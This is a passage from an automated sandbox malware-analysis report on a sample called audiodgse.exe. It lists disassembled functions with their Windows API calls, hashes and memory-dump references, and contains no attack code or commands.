Opcode Fuzzy Hash: 1fe632c829319894c03c4f390d25a6009dfdfdfa543a20855fb3c628d0abeb6c
Instruction Fuzzy Hash: 1B21A8B3604106ABCB10EB64DE8495F73E9EB48318B204437F501F32D1D77CA8528B5E

Uniqueness

Uniqueness Score: -1.00%

Function 004022B2 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062DD: FindFirstFileA.KERNELBASE(?,00421558,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,00405AA3,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,T'qu,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,75712754,C:\Users\user\AppData\Local\Temp\), ref: 004062E8
Part of subcall function 004062DD: FindClose.KERNEL32(00000000), ref: 004062F4

lstrlenA.KERNEL32 ref: 004022F2
lstrlenA.KERNEL32(00000000), ref: 004022FC
SHFileOperationA.SHELL32(?,?,?,00000000), ref: 00402324

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: FileFindlstrlen$CloseFirstOperation
String ID:
API String ID: 1486964399-0
Opcode ID: d2ded405d62ae805881579f4b3fa0f6d32604239724b875ac766ac1e54bcc50d
Instruction ID: e190a191dd6904399be212acf1c509ba618b837bf102c15a3da6bfbe2c681905
Opcode Fuzzy Hash: d2ded405d62ae805881579f4b3fa0f6d32604239724b875ac766ac1e54bcc50d
Instruction Fuzzy Hash: E6112A71E04318AACB00EFB98949A8EBBB9EF04318F10407BA405FB2D2D6BCD540CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040254C Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040257E
RegEnumValueA.ADVAPI32 ref: 00402591
RegCloseKey.KERNEL32(?), ref: 004025A9

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 8d3a1cd54caa8d1fdba4ab421f0a15f787f245c239668e29e6e22b939a192df5
Instruction ID: 35fd857a3e442691b1a787247be78dd7b49a46040516f967143c2ea575d22cfd
Opcode Fuzzy Hash: 8d3a1cd54caa8d1fdba4ab421f0a15f787f245c239668e29e6e22b939a192df5
Instruction Fuzzy Hash: 5801B1B1905204FFE7119F659E89ABF7ABCEB40344F10443EF402B62C0D6B85E019669

Uniqueness

Uniqueness Score: -1.00%

Function 004024DA Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32 ref: 0040250A
RegCloseKey.KERNEL32(?), ref: 004025A9

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: b00cdceb79a367ba246cd9f8507522f39a7060d96376a61327adf18ce8985981
Instruction ID: 8f3c8c2c6778634c6bf67ed2425ae169c6cf17cae75ec7db2a606e7394f4df6a
Opcode Fuzzy Hash: b00cdceb79a367ba246cd9f8507522f39a7060d96376a61327adf18ce8985981
Instruction Fuzzy Hash: 36118F71905205FEDB11CF64CA5D5AEBAB4AF15344F60447FE042B62C0D2B88A45DB2E

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32 ref: 004013E4
SendMessageA.USER32 ref: 004013F4

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 42208f6ee167e53754ec85f902deef064f05172097489c9424a2864a03bb7ea4
Instruction ID: 3754a530b6758dc8908f2ef617aa9c280200ea706ec51d0fb7e67c491179f4d9
Opcode Fuzzy Hash: 42208f6ee167e53754ec85f902deef064f05172097489c9424a2864a03bb7ea4
Instruction Fuzzy Hash: A3012831724210ABE7294B389D04B2A369CE710328F11823BF811F72F1D6B8DC02DB4D

Uniqueness

Uniqueness Score: -1.00%

Function 004023E8 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueA.ADVAPI32(00000000,00000000), ref: 00402409
RegCloseKey.ADVAPI32(00000000), ref: 00402412

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: 1e106540e0c6f3fecb343495f38143b2ac523dee1af81adac6be3cf30664865e
Instruction ID: ce1450a8ab12a7957634bce685e0bfb7e2b45ee5234afc219fd3c41b35330c67
Opcode Fuzzy Hash: 1e106540e0c6f3fecb343495f38143b2ac523dee1af81adac6be3cf30664865e
Instruction Fuzzy Hash: AAF0F672E04120ABD700AFB89B4DAAE72A89B44304F11017BF202B72C1D5F85E02826E

Uniqueness

Uniqueness Score: -1.00%

Function 004051D3 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 004051E3

Part of subcall function 004040B4: SendMessageA.USER32 ref: 004040C6

OleUninitialize.OLE32 ref: 0040522F

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: 8f85f5a8b917a8e83986f1e9b037d27413aa3264665e42cac53abf952752d631
Instruction ID: c8a811e9c9fb5a5b15e00e8e17d8607129a9d45208e9b7412ec8ad736198a790
Opcode Fuzzy Hash: 8f85f5a8b917a8e83986f1e9b037d27413aa3264665e42cac53abf952752d631
Instruction Fuzzy Hash: 82F0F0F6A00201BBEA606B40A801B1773B0EFD0702F00847EFF44B22E1D63D59028E6E

Uniqueness

Uniqueness Score: -1.00%

Function 00401A1E Relevance: 3.0, APIs: 2, Instructions: 30stringCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A31
lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A44

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: EnvironmentExpandStringslstrcmp
String ID:
API String ID: 1938659011-0
Opcode ID: 778fc31b8dd6c980b9d2567d316741ca00daeb01fb42aaa0a4e9e8a2c55b1430
Instruction ID: 79d5ad403a5aaaf22ef605bc71de2bbac2c7999a6642915e38ea97ae4a47edd5
Opcode Fuzzy Hash: 778fc31b8dd6c980b9d2567d316741ca00daeb01fb42aaa0a4e9e8a2c55b1430
Instruction Fuzzy Hash: BAF0A771B09240EBCB21DF759D44A9F7FE8EF91354B10803BE145F6290D2388901CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00401E8F Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401EAD
EnableWindow.USER32(00000000,00000000), ref: 00401EB8

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 6c68a4902ab0689787260bc54c5c5f1836fe880f95a3f1419a379d47a79b2dce
Instruction ID: ea2ebfb6392eb1d35c1d77cf7a204b1acfca181ccf64587d83a13520139c7bad
Opcode Fuzzy Hash: 6c68a4902ab0689787260bc54c5c5f1836fe880f95a3f1419a379d47a79b2dce
Instruction Fuzzy Hash: C8E012B2A08210DFD715DFA8AA859AE77B4FB84325F10493BE102F12D1D7B85940965D

Uniqueness

Uniqueness Score: -1.00%

Function 00406372 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,004032A8,0000000A), ref: 00406384
GetProcAddress.KERNEL32(00000000,?,?,?,004032A8,0000000A), ref: 0040639F

Part of subcall function 00406304: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040631B
Part of subcall function 00406304: wsprintfA.USER32 ref: 00406354
Part of subcall function 00406304: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406368

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: b4adfc3f0f4b19c213d1a711131d711d9af4f575b66eeead30b066e316f5e6c0
Instruction ID: 5c1bd2d9329a739c8a877d318ed38f6c7ac4115b407851283e1fe7e546b0050a
Opcode Fuzzy Hash: b4adfc3f0f4b19c213d1a711131d711d9af4f575b66eeead30b066e316f5e6c0
Instruction Fuzzy Hash: 85E08C32A08210ABD7106B709D0493B72E89B85700302483EFE0AF2191D738EC21AAA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405B73 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\AppData\Roaming\audiodgse.exe,80000000,00000003), ref: 00405B77
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B99

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
Instruction ID: 2f873e3f3c43f12a3908621a4267836d753c9203ad123c8b10a06e7f93ada197
Opcode Fuzzy Hash: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
Instruction Fuzzy Hash: C7D09E31658201EFEF098F20DD16F2EBBA2EB84B00F10962CB642944E0D6715815AB16

Uniqueness

Uniqueness Score: -1.00%

Function 00405644 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000,00403228,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 0040564A
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405658

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
Instruction ID: fc3bbe6b068c7ca676e2af9f6a434936c7df2cd1c21a2d5f2b74ac8b5b27fed5
Opcode Fuzzy Hash: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
Instruction Fuzzy Hash: 0BC08C30688101AADA002B308D08B073A55AB20340F608836600AE00F0CA32A600DD3F

Uniqueness

Uniqueness Score: -1.00%

Function 72BE2A38 Relevance: 1.6, APIs: 1, Instructions: 143COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000), ref: 72BE2AF7

Memory Dump Source

Source File: 00000005.00000002.1054702940.0000000072BE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 72BE0000, based on PE: true

Associated: 00000005.00000002.1054694462.0000000072BE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1054709441.0000000072BE3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1054717890.0000000072BE5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_72be0000_audiodgse.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 4b8514f2948a69a262e82f33fa022d4a9f69571b37429ea5f8efa3dae65c7b89
Instruction ID: c902753f0fef42a8737feeee641d3f834d88dea76f8878004f7754b13aaf3ab4
Opcode Fuzzy Hash: 4b8514f2948a69a262e82f33fa022d4a9f69571b37429ea5f8efa3dae65c7b89
Instruction Fuzzy Hash: 9E415ABBD40204DFEB21DFBAD881B593B75EB14394F20593DE607C7241D73895818BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402631 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: wsprintf
String ID:
API String ID: 2111968516-0
Opcode ID: 366e3e88ed94c459e0a2c565d96ad95acb986587cc084f2d6ef043885af1d26a
Instruction ID: 3a2c95f3f261f3e7b92da62a1208cffd6d7f8b014e901ac2ca999815bcbce589
Opcode Fuzzy Hash: 366e3e88ed94c459e0a2c565d96ad95acb986587cc084f2d6ef043885af1d26a
Instruction Fuzzy Hash: 2D21C770C0428AAADF219F644A456BFBB709B11318F14447FE891B63D1C1BD9981CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004026EF Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040270D

Part of subcall function 00405F38: wsprintfA.USER32 ref: 00405F45

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: a9d8ee2bd697c9ca0f2ad565d07bdf8e6e2528e0a7b3e3f739defcc45e62caf5
Instruction ID: f53dea761aa5693b03f4aeaa9096613f160725ff62c28ab2a383c2bfee997f34
Opcode Fuzzy Hash: a9d8ee2bd697c9ca0f2ad565d07bdf8e6e2528e0a7b3e3f739defcc45e62caf5
Instruction Fuzzy Hash: 5AE0EDB1A04215BBD702AB95AE89DBE776CEB44315F10043BF201F11C1C67D4941966E

Uniqueness

Uniqueness Score: -1.00%

Function 00402363 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040239C

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: a663e1ee88aff6bb8d151cd1cce8982361632cb1983bd685a1e33b20e6578072
Instruction ID: fe35eca7c2654f279d717fea31bdeaa6937bb5491eee9e26a1e5aab6719f7fed
Opcode Fuzzy Hash: a663e1ee88aff6bb8d151cd1cce8982361632cb1983bd685a1e33b20e6578072
Instruction Fuzzy Hash: B2E04F31A003256BDB213EB25E8ED6F3669AB84744B16113BFA01BA2C2D9BC1C05C26D

Uniqueness

Uniqueness Score: -1.00%

Function 00405E8E Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

